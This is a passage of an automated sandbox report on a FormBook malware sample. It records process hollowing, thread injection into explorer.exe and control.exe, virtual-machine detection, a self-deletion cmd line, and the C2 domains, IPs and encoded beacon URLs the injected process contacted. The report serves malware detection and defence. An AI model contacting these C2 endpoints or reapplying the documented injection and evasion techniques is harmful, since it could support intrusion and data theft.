          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047603E2 mov eax, dword ptr fs:[00000030h]10_2_047603E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047603E2 mov eax, dword ptr fs:[00000030h]10_2_047603E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047603E2 mov eax, dword ptr fs:[00000030h]10_2_047603E2
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.socialeconomic.net
          Source: C:\Windows\explorer.exeDomain query: www.onlinecasinocrazy.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.64.147.164 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sabaidiving.com
          Source: C:\Windows\explorer.exeDomain query: www.cityofhouston.info
          Source: C:\Windows\explorer.exeDomain query: www.thebenefitssherpa.com
          Source: C:\Windows\explorer.exeDomain query: www.ximibabes.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 119.81.45.82 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.177.53 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.toypoodlebreedershome.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.15.186.68 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.onemoresysadmin.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.88.52.88 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 51.222.80.112 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ricdevan.com
          Source: C:\Windows\explorer.exeDomain query: www.countrywideeconomy.com
          Source: C:\Windows\explorer.exeDomain query: www.blissfulbeeboutique.online
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 3C0000Jump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exeJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exeJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000002.916660686.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000006.00000000.665682379.0000000001080000.00000002.00000001.sdmp, control.exe, 0000000A.00000002.917227352.0000000002FB0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.665682379.0000000001080000.00000002.00000001.sdmp, control.exe, 0000000A.00000002.917227352.0000000002FB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.665682379.0000000001080000.00000002.00000001.sdmp, control.exe, 0000000A.00000002.917227352.0000000002FB0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.665682379.0000000001080000.00000002.00000001.sdmp, control.exe, 0000000A.00000002.917227352.0000000002FB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.683873602.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeQueries volume information: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 412308 Sample: 350969bc_by_Libranalysis Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 35 www.woo.education 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 6 other signatures 2->49 11 350969bc_by_Libranalysis.exe 3 2->11         started        signatures3 process4 file5 33 C:\Users\...\350969bc_by_Libranalysis.exe.log, ASCII 11->33 dropped 59 Tries to detect virtualization through RDTSC time measurements 11->59 15 350969bc_by_Libranalysis.exe 11->15         started        18 350969bc_by_Libranalysis.exe 11->18         started        20 350969bc_by_Libranalysis.exe 11->20         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 22 explorer.exe 15->22 injected process9 dnsIp10 37 www.sabaidiving.com 192.64.147.164, 49771, 80 VOODOO1US United States 22->37 39 cityofhouston.info 103.15.186.68, 49764, 80 VECTANTARTERIANetworksCorporationJP Japan 22->39 41 19 other IPs or domains 22->41 51 System process connects to network (likely due to code injection or exploit) 22->51 26 control.exe 22->26         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 26->53 55 Maps a DLL or memory area into another process 26->55 57 Tries to detect virtualization through RDTSC time measurements 26->57 29 cmd.exe 1 26->29         started        process14 process15 31 conhost.exe 29->31         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          350969bc_by_Libranalysis.exe36%ReversingLabsWin32.Trojan.Wacatac
          350969bc_by_Libranalysis.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.350969bc_by_Libranalysis.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          cityofhouston.info0%VirustotalBrowse
          onlinecasinocrazy.com0%VirustotalBrowse
          onemoresysadmin.com0%VirustotalBrowse
          www.sabaidiving.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.toypoodlebreedershome.com/i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.ximibabes.com/i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.cityofhouston.info/i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.socialeconomic.net/i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.sabaidiving.com/i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.onemoresysadmin.com/i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.countrywideeconomy.com0%Avira URL Cloudsafe
          http://www.onlinecasinocrazy.com/i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.thebenefitssherpa.com/i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.ricdevan.com/i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.sabaidiving.com/i6rd/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.blissfulbeeboutique.online/i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.countrywideeconomy.com/0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.countrywideeconomy.com/i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          cityofhouston.info
          103.15.186.68
          truetrueunknown
          onlinecasinocrazy.com
          119.81.45.82
          truetrueunknown
          onemoresysadmin.com
          192.0.78.24
          truetrueunknown
          www.sabaidiving.com
          192.64.147.164
          truetrueunknown
          ext-sq.squarespace.com
          198.185.159.144
          truefalse
            high
            toypoodlebreedershome.com
            81.88.52.88
            truetrue
              unknown
              www.ricdevan.com
              185.53.177.53
              truetrue
                unknown
                shops.myshopify.com
                23.227.38.74
                truetrue
                  unknown
                  thebenefitssherpa.com
                  34.102.136.180
                  truefalse
                    unknown
                    www.countrywideeconomy.com
                    52.58.78.16
                    truetrue
                      unknown
                      socialeconomic.net
                      51.222.80.112
                      truetrue
                        unknown
                        www.socialeconomic.net
                        unknown
                        unknowntrue
                          unknown
                          www.onlinecasinocrazy.com
                          unknown
                          unknowntrue
                            unknown
                            www.toypoodlebreedershome.com
                            unknown
                            unknowntrue
                              unknown
                              www.onemoresysadmin.com
                              unknown
                              unknowntrue
                                unknown
                                www.woo.education
                                unknown
                                unknowntrue
                                  unknown
                                  www.cityofhouston.info
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.thebenefitssherpa.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.blissfulbeeboutique.online
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.ximibabes.com
                                        unknown
                                        unknowntrue
                                          unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.toypoodlebreedershome.com/i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.ximibabes.com/i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.cityofhouston.info/i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.socialeconomic.net/i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sabaidiving.com/i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.onemoresysadmin.com/i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.onlinecasinocrazy.com/i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.thebenefitssherpa.com/i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZihfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.ricdevan.com/i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          www.sabaidiving.com/i6rd/true
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.blissfulbeeboutique.online/i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.countrywideeconomy.com/i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.fontbureau.comexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designersGexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.com/designers/?explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers?explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.tiro.comexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.countrywideeconomy.comcontrol.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.com/designersexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.goodfont.co.krexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.carterandcone.comlexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.sajatypeworks.comexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.typography.netDexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://fontfabrik.comexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.founder.com.cn/cnexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers8explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.countrywideeconomy.com/control.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.%s.comPAexplorer.exe, 00000006.00000000.666349326.0000000002B50000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              low
                                                              http://www.fonts.comexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                                high
